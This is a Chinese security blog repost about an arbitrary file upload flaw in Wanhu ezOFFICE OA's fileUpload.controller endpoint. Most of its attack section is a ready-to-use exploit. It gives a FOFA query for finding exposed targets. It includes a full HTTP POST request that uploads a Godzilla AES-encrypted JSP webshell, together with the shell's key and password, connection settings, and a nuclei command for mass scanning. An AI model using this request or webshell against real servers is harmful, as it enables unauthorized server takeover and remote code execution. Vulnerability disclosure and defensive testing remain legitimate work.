万户OA fileUpload.controller 任意文件上传漏洞

渗透技巧 2年前 (2022) admin
1,139 0 0

0x01 阅读须知

融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!

0x02 漏洞描述

万户软件网络是业内普遍认可的智慧政务办公专家,OA系统国家行业标准编制组长单位,协同软件国家行业标准编制组长单位,22年专注协同管理领域.为您提供定制化的智慧政务一体化办公解决方案。万户OA fileUpload.controller处存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器,导致服务器失陷

万户OA fileUpload.controller 任意文件上传漏洞


0x03 漏洞复现

fofaapp=”万户网络-ezOFFICE”

1.执行POC写入哥斯拉马,返回上传后的文件名

POST /defaultroot/upload/fileUpload.controller HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0Accept-Encoding: gzip, deflateAccept: */*Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0Content-Length: 1318
--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0Content-Disposition: form-data; name="file"; filename="cmd.jsp"Content-Type: application/octet-streamContent-Transfer-Encoding: binary
<%! String xc="3c6e0b8a9c15224a"; class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }}%><%try{byte[] data=new byte[Integer.parseInt(request.getHeader("Content-Length"))];java.io.InputStream inputStream= request.getInputStream();int _num=0;while ((_num+=inputStream.read(data,_num,data.length))<data.length);data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters", data);Object f=((Class)session.getAttribute("payload")).newInstance();java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();f.equals(arrOut);f.equals(pageContext);f.toString();response.getOutputStream().write(x(arrOut.toByteArray(), true));} }catch (Exception e){}%>--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0--

万户OA fileUpload.controller 任意文件上传漏洞


2.哥斯拉连接,获得一个webshell

连接地址:http://{{Hostname}}/defaultroot/upload/html/返回文件名.jsp密码:pass加密器:JAVA_AES_RAW

万户OA fileUpload.controller 任意文件上传漏洞


3.nuclei批量验证脚本已发表于知识星球

nuclei.exe -t wanhuOA_fileUpload_upload.yaml -l subs.txt stats

万户OA fileUpload.controller 任意文件上传漏洞


网络安全神兵利器分享
网络安全漏洞N/0day分享
    加入星球请扫描下方二维码,更多精彩,敬请期待!
???

万户OA fileUpload.controller 任意文件上传漏洞

长按二维码识别进入

0x04 公司简介

江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉……

编制:sm

审核:fjh

审核:Dog



原文始发于微信公众号(融云攻防实验室):万户OA fileUpload.controller 任意文件上传漏洞

版权声明:admin 发表于 2022年9月28日 下午4:54。
转载请注明:万户OA fileUpload.controller 任意文件上传漏洞 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...